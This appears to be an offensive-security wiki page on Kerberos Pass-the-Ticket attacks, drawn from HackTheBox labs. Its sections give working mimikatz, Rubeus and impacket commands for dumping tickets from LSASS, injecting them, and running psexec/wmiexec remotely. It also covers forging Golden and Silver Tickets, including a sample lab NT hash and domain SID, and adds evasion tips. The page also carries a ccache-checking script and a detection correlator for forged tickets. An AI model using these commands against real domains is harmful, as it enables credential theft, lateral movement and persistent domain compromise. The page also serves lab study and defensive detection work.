
Pass-the-Ticket (PTT)

#Overview

Pass-the-Ticket (PTT) authenticates to Kerberos-protected services by reusing Kerberos tickets (TGTs and service tickets) taken from a compromised host. Unlike Pass-the-Hash it needs no NTLM hash, and it works against services that accept only Kerberos. Tickets live in LSASS memory; mimikatz and Rubeus can export them, and an exported ticket can be injected into another logon session (on the same host or an attacker-controlled one) or converted for use with impacket on Linux.

#Prerequisites

  • Local Administrator/SYSTEM on the compromised host to extract tickets from other logon sessions (an unprivileged user can still export their own service tickets)
  • A ticket for the target user: a TGT (any service as that user) or a service ticket for the specific SPN you need
  • Attacker clock within the KDC's maximum skew of the DC (5 minutes by default)
  • mimikatz or Rubeus (Windows); impacket, including impacket-ticketConverter and impacket-ticketer (Linux)

#Exploitation / Execution

#1. Exporting Tickets

Mimikatz (from an elevated Windows shell; sekurlsa needs SeDebugPrivilege)

```powershell
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export           # Export every ticket in LSASS to .kirbi files
```

Tickets are written to the current directory as .kirbi files, one per ticket, named after the logon session, client and service. Look for:

  • files with krbtgt in the name: TGTs, the highest-value tickets (they let you request a ticket for any service as that user)
  • everything else: service tickets, named by SPN class (MSSQLSvc, HTTP, CIFS, HOST, LDAP), usable only against that service

Rubeus (from Windows; elevation is needed to reach other users' sessions, otherwise only the current user's service tickets are returned)

```powershell
.\Rubeus.exe dump                                 # Dump all tickets (base64 .kirbi blobs)
.\Rubeus.exe dump /service:krbtgt /nowrap         # TGTs only, base64 on a single line for ptt
.\Rubeus.exe triage                               # Table of tickets in memory: LUID, user, service, expiry
.\Rubeus.exe dump /luid:0x12345                   # Only the logon session with that LUID (from triage)
```

#2. Importing Tickets

Mimikatz

```powershell
mimikatz # kerberos::ptt <ticket_file>.kirbi       # Inject the ticket into the current logon session
# After injection, native tools use it transparently:
dir \\DC\C$                                        # SMB access with the injected ticket
```

Confirm the injection with klist. Address the target by host name or FQDN: a UNC path to an IP address has no SPN, so the client falls back to NTLM and the injected ticket is never used.

Rubeus

```powershell
.\Rubeus.exe ptt /ticket:<base64_ticket>           # Inject a base64 blob (from dump /nowrap) or a .kirbi path
```

#3. Ticket Conversion (Linux <-> Windows)

Convert .kirbi to .ccache (Mimikatz -> Linux)

```bash
impacket-ticketConverter ticket.kirbi ticket.ccache
```

Convert .ccache to .kirbi (Linux -> Mimikatz)

```bash
impacket-ticketConverter ticket.ccache ticket.kirbi
```

#4. Using Tickets on Linux

```bash
export KRB5CCNAME=/path/to/ticket.ccache           # Point the Kerberos client at the cache
# impacket tools: -k authenticates from the cache, -no-pass suppresses the password prompt
impacket-psexec <domain>/<user>@<target_fqdn> -k -no-pass
impacket-wmiexec <domain>/<user>@<target_fqdn> -k -no-pass
impacket-mssqlclient <domain>/<user>@<target_fqdn> -k -no-pass   # Kerberos auth to MSSQL
```

The -k flag makes impacket authenticate with Kerberos from the cache named by KRB5CCNAME: a TGT in the cache lets the tool request the service ticket it needs, while a bare service ticket only works against the SPN it was issued for. <user> and <domain> must match the cache's principal, and the target must be the host name from the SPN (an IP address has no SPN, so Kerberos fails); add -dc-ip <DC_IP> when DNS for the domain is not set up. On Kali the wrappers are named impacket-<tool>; with a pip install they are <tool>.py.
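Before pointing impacket at a target it is worth knowing what the cache actually holds: which principal, which SPN, and how long the ticket is good for. The following is an added example, not impacket's own code (impacket ships a full parser in impacket.krb5.ccache.CCache): a standard-library reader for the version-4 ccache layout that KRB5CCNAME points at, plus the three checks from this section and the pitfalls below (expiry, clock skew, SPN host matching the target). The sample cache is constructed in the block with placeholder ticket bytes; the principal, realm and SPNs are made up.

```python
"""Inspect a krb5 ccache before handing it to impacket -k (added example, stdlib only)."""
import struct
import time

MAX_SKEW = 300          # KDC default maximum clock skew, seconds
WARN_BEFORE = 15 * 60   # warn when less than 15 minutes of lifetime remain


def _cos(data):
    """Counted octet string: uint32 length followed by the bytes."""
    return struct.pack("!I", len(data)) + data


def _principal(name_type, realm, components):
    out = struct.pack("!II", name_type, len(components)) + _cos(realm.encode())
    for comp in components:
        out += _cos(comp.encode())
    return out


def build_ccache(client, realm, creds):
    """Serialise a version-4 ccache. creds: (server components, start, end, renew_till, ticket DER)."""
    buf = b"\x05\x04" + struct.pack("!H", 0)                  # format 0x0504, no header tags
    buf += _principal(1, realm, [client])                      # default principal (NT-PRINCIPAL)
    for sname, start, end, renew, ticket in creds:
        buf += _principal(1, realm, [client])                  # client
        buf += _principal(2, realm, sname)                     # server (NT-SRV-INST)
        buf += struct.pack("!HI", 18, 32) + b"\x00" * 32       # keyblock: etype 18 (aes256-cts), dummy key
        buf += struct.pack("!IIII", start, start, end, renew)  # authtime, starttime, endtime, renew_till
        buf += b"\x00" + struct.pack("!I", 0x50A10000)         # is_skey, ticket flags
        buf += struct.pack("!II", 0, 0)                        # no addresses, no authdata
        buf += _cos(ticket) + _cos(b"")                        # ticket, second_ticket
    return buf


class _Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk

    def u16(self):
        return struct.unpack("!H", self.take(2))[0]

    def u32(self):
        return struct.unpack("!I", self.take(4))[0]

    def principal(self):
        _name_type, count = self.u32(), self.u32()
        realm = self.take(self.u32()).decode()
        return "/".join(self.take(self.u32()).decode() for _ in range(count)) + "@" + realm


def parse_ccache(data):
    """Return (default principal, [credential dicts]) from a version-4 ccache."""
    r = _Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache version 4 is handled")
    r.take(r.u16())                                            # header tags (DeltaTime etc.)
    default = r.principal()
    creds = []
    while r.pos < len(data):
        client, server = r.principal(), r.principal()
        etype = r.u16()
        r.take(r.u32())                                        # session key
        _authtime, start, end, renew = [r.u32() for _ in range(4)]
        r.take(1)                                              # is_skey
        flags = r.u32()
        for _ in range(2):                                     # addresses, then authdata
            for _ in range(r.u32()):
                r.u16()
                r.take(r.u32())
        ticket = r.take(r.u32())
        r.take(r.u32())                                        # second_ticket
        creds.append({"client": client, "server": server, "etype": etype, "start": start,
                      "end": end, "renew_till": renew, "flags": flags, "ticket_len": len(ticket)})
    return default, creds


def check_ticket(cred, target_fqdn, now=None):
    """Warnings to resolve before using cred against target_fqdn (empty list means go)."""
    now = time.time() if now is None else now
    warnings = []
    if now + MAX_SKEW < cred["start"]:
        warnings.append("start time is ahead of this clock by more than the 5-minute skew; sync time (ntpdate -u <DC_IP>)")
    if now > cred["end"]:
        warnings.append("ticket expired; an expired ticket cannot be renewed, export a fresh one")
    elif cred["end"] - now < WARN_BEFORE:
        warnings.append(f"ticket expires in {int(cred['end'] - now) // 60} min; renew or re-export now")
    svc_class, _, svc_host = cred["server"].split("@", 1)[0].partition("/")
    svc_host = svc_host.split(":")[0].lower()                # drop an MSSQLSvc-style port
    if svc_class.lower() != "krbtgt" and svc_host != target_fqdn.lower():
        warnings.append(f"SPN host {svc_host} is not {target_fqdn}; a service ticket only works for its own SPN")
    return warnings


# Constructed sample: a TGT (renewable for 7 days) and a CIFS ticket for alice, issued at t=1000.
SAMPLE_CCACHE = build_ccache("alice", "CORP.LOCAL", [
    (["krbtgt", "CORP.LOCAL"], 1000, 37000, 605800, b"\x61\x00"),   # placeholder DER, not a real ticket
    (["cifs", "fs01.corp.local"], 1000, 37000, 37000, b"\x61\x00"),
])

if __name__ == "__main__":
    default, creds = parse_ccache(SAMPLE_CCACHE)
    print("default principal:", default)
    for cred in creds:
        print(cred["server"], "valid", cred["start"], "to", cred["end"])
        for warning in check_ticket(cred, "sql01.corp.local", now=2000):
            print("  WARNING:", warning)
```

Run it against a real cache with `parse_ccache(open(path, "rb").read())`; the TGT passes the SPN check for any target because impacket can use it to request the right service ticket, while the CIFS ticket is flagged for sql01 because it can only ever be presented to fs01.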

#5. Golden Ticket (Forged TGT)

A Golden Ticket is a forged TGT encrypted and signed with the krbtgt account's key. The KDC accepts it as genuine and issues service tickets for any service in the domain as the user it names:

```powershell
# Requires: KRBTGT NT hash (or AES key), domain SID, domain FQDN; typically obtained with DCSync
mimikatz # kerberos::golden /domain:<domain> /sid:<SID> /krbtgt:<KRBTGT_HASH> /user:Administrator /id:500 /ticket:golden.kirbi
mimikatz # kerberos::ptt golden.kirbi
```

mimikatz gives the forged TGT a 10-year lifetime by default, and the KDC honours whatever lifetime a correctly encrypted TGT carries, so a Golden Ticket is a persistence mechanism that outlives every user password change; only resetting the krbtgt password twice invalidates it. Two practical points: supplying the NT hash with /krbtgt: yields an RC4 ticket that stands out in an AES-only domain (use /aes256: with the AES key instead), and the user name and RID should belong to a real account, since DCs enforcing the PAC requestor validation from KB5008380 reject TGTs whose PAC does not match an existing account.

#6. Silver Ticket (Forged Service Ticket)

A Silver Ticket is a forged service ticket for one SPN, encrypted with the key of the account the service runs as: the computer account for services running as SYSTEM (CIFS, HOST), or the service account for something like MSSQLSvc:

```powershell
# Requires: the service account's NT hash, domain SID, target host FQDN and service class
# For the MSSQL service
mimikatz # kerberos::golden /domain:<domain> /sid:<SID> /target:<FQDN> /service:MSSQLSvc /rc4:<NTLM_HASH> /user:Administrator /ticket:mssql.kirbi
mimikatz # kerberos::ptt mssql.kirbi
```

Silver Tickets are stealthier than Golden Tickets because the DC is never involved: the service decrypts and validates the ticket with its own key, so nothing is logged on the KDC and only the target host sees the resulting logon.

Impacket ticketer (Silver Ticket alternative)

```bash
impacket-ticketer -nthash <NT_HASH> -domain-sid <DOMAIN_SID> -domain <domain> -dc-ip <DC_IP> -spn <SPN> Administrator
# e.g. (Escape): the service only checks that the ticket decrypts with its own key, so the
# SPN's service class can be anything as long as the host part is right
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator

export KRB5CCNAME=Administrator.ccache             # ticketer writes <user>.ccache in the current directory
impacket-mssqlclient -k dc.sequel.htb
```

#Ticket Lifecycle Considerations

| Property     | TGT                                        | Service ticket (TGS)                         |
|--------------|--------------------------------------------|----------------------------------------------|
| Lifetime     | 10 hours (default MaxTicketAge)            | 10 hours (default MaxServiceAge)             |
| Renewal      | Renewable for up to 7 days (MaxRenewAge)   | Not extended; a new one is requested with the TGT |
| Scope        | Request a ticket for any service           | Access to one SPN only                       |
| Validated by | KDC (DC)                                   | The service itself, with its own key         |

#Common Pitfalls

  • Warning: Ticket expiration: check the end time (klist on Windows; klist with KRB5CCNAME set on Linux) and renew or re-export before it lapses; a TGT can be renewed for up to 7 days, but an expired ticket cannot be renewed at all
  • Warning: Time skew: the KDC rejects requests when the attacker's clock is more than 5 minutes from the DC's; sync first with sudo ntpdate -u <DC_IP>
  • Warning: Exporting other sessions' tickets requires SYSTEM or Administrator (mimikatz sekurlsa also needs SeDebugPrivilege via privilege::debug)
  • Warning: Golden Tickets survive user password changes; only resetting the krbtgt password twice invalidates them, because the KDC keeps accepting tickets under the previous key after a single reset

#OPSEC Considerations

  • Shield: mimikatz sekurlsa::tickets reads LSASS memory, so it trips the same telemetry as credential dumping (Sysmon Event ID 10 ProcessAccess on lsass.exe, EDR LSASS-access rules); Rubeus dump/triage go through the LSA API (LsaCallAuthenticationPackage) instead, which avoids that particular signal, though Rubeus itself is widely signatured
  • Shield: Golden Ticket usage is detectable by Defender for Identity (formerly ATA) and by SIEM correlation: a 4769 service-ticket request for an account with no 4768 TGT request on any DC, or an RC4 (0x17) ticket in a domain that otherwise issues AES
  • Shield: Silver Ticket usage never touches the DC, so detection relies on the target host's own logs: a 4624 network logon with Kerberos authentication for which no 4769 exists on any DC
  • Shield: Injecting a ticket into an existing session creates no new logon event on the source host; the target still records a 4624 (logon type 3) when the ticket is used
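The two correlations just described, for the Golden and Silver Ticket sections above as well as this one, are simple enough to show end to end. The block below is an added example written for this page, not a product rule, and it runs over constructed events: the field names are my own shorthand for the Windows fields (TargetUserName, ServiceName, TicketEncryptionType, LogonType, AuthenticationPackageName), timestamps are Unix seconds, and the hosts DC01, FS01 and SQL01 are made up. It assumes every DC's 4768/4769/4770 events are collected (4769 needs "Audit Kerberos Service Ticket Operations" enabled) and uses the default 10-hour ticket lifetime as the lookback; a shorter lookback or a missing DC's logs produces false positives, which is why the functions return candidates rather than verdicts.

```python
"""Golden/Silver Ticket indicators over Windows Security events (added example, constructed data)."""
from collections import defaultdict

TICKET_LIFETIME = 10 * 3600   # default MaxTicketAge / MaxServiceAge: the correlation lookback

# Constructed sample: a legitimate chain for alice, then a Golden and a Silver Ticket used as Administrator.
EVENTS = [
    {"t": 1000, "host": "DC01", "id": 4768, "user": "alice", "etype": "0x12", "ip": "10.0.0.5"},
    {"t": 1010, "host": "DC01", "id": 4769, "user": "alice", "service": "cifs/fs01.corp.local", "etype": "0x12", "ip": "10.0.0.5"},
    {"t": 1015, "host": "FS01", "id": 4624, "user": "alice", "logon_type": 3, "auth": "Kerberos", "ip": "10.0.0.5"},
    # Golden: service tickets requested with a forged TGT; no 4768 was ever logged for this account,
    # and the ticket is RC4 because mimikatz was fed the krbtgt NT hash.
    {"t": 5000, "host": "DC01", "id": 4769, "user": "Administrator", "service": "cifs/dc01.corp.local", "etype": "0x17", "ip": "10.0.0.99"},
    # Silver: a forged MSSQLSvc ticket presented straight to SQL01; the KDC never issued a 4769 for it.
    {"t": 6000, "host": "SQL01", "id": 4624, "user": "Administrator", "logon_type": 3, "auth": "Kerberos", "ip": "10.0.0.99"},
]


def _spn_host(spn):
    """'MSSQLSvc/sql01.corp.local:1433' -> 'sql01' (short host name, lower-case)."""
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":")[0].split(".")[0].lower()


def golden_ticket_candidates(events, lookback=TICKET_LIFETIME):
    """4769 requests whose account had no TGT issued or renewed (4768/4770) on any DC within lookback."""
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] in (4768, 4770):
            tgt_times[e["user"].lower()].append(e["t"])
    hits = []
    for e in events:
        if e["id"] != 4769 or e["service"].lower().startswith("krbtgt/"):
            continue                                   # krbtgt 4769s are TGT renewals, covered by 4770
        if any(e["t"] - lookback <= t <= e["t"] for t in tgt_times[e["user"].lower()]):
            continue
        reasons = ["TGS request with no TGT request for this account on any DC"]
        if e.get("etype") == "0x17":
            reasons.append("RC4-HMAC ticket; mimikatz default when given the krbtgt NT hash")
        hits.append({"t": e["t"], "user": e["user"], "service": e["service"], "ip": e["ip"],
                     "why": "; ".join(reasons)})
    return hits


def silver_ticket_candidates(events, lookback=TICKET_LIFETIME):
    """Kerberos network logons (4624 type 3) on a host with no 4769 for that account and host on any DC."""
    tgs_times = defaultdict(list)
    for e in events:
        if e["id"] == 4769:
            tgs_times[(e["user"].lower(), _spn_host(e["service"]))].append(e["t"])
    hits = []
    for e in events:
        if e["id"] != 4624 or e.get("logon_type") != 3 or e.get("auth") != "Kerberos":
            continue
        key = (e["user"].lower(), e["host"].lower())
        if any(e["t"] - lookback <= t <= e["t"] for t in tgs_times[key]):
            continue
        hits.append({"t": e["t"], "user": e["user"], "host": e["host"], "ip": e["ip"],
                     "why": "Kerberos logon with no service ticket issued by the KDC for this host"})
    return hits


if __name__ == "__main__":
    for hit in golden_ticket_candidates(EVENTS):
        print("GOLDEN?", hit)
    for hit in silver_ticket_candidates(EVENTS):
        print("SILVER?", hit)
```

Note what each rule keys on: the Golden check needs only DC logs, because a forged TGT skips the AS exchange entirely; the Silver check needs the member host's 4624 joined against the DCs' 4769s, because a forged service ticket skips the TGS exchange. Neither fires for alice, whose logon is preceded by both a 4768 and a matching 4769.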

#Post-Exploitation Value

  • A TGT lets you request a service ticket for any service in the domain as that user
  • A service ticket gives targeted access to one service (MSSQL, HTTP, CIFS) without touching the KDC again
  • A Golden Ticket gives domain persistence for as long as the krbtgt key is not rotated
  • Reusing tickets across systems gives lateral movement without knowing any password or hash

#Cross-References

#Tool References

| Tool               | Link                                   |
|--------------------|----------------------------------------|
| mimikatz           | https://github.com/gentilkiwi/mimikatz |
| Rubeus             | https://github.com/GhostPack/Rubeus    |
| impacket           | https://github.com/fortra/impacket     |
| ticketer (impacket)| Part of the impacket suite             |

#Source Machines

  • Sauna (Easy, AD) - DCSync attack using replication privileges
  • Escape (Medium, AD) - Silver Ticket for MSSQL service access as Administrator
  • Flight (Hard, AD) - Rubeus for machine account ticket extraction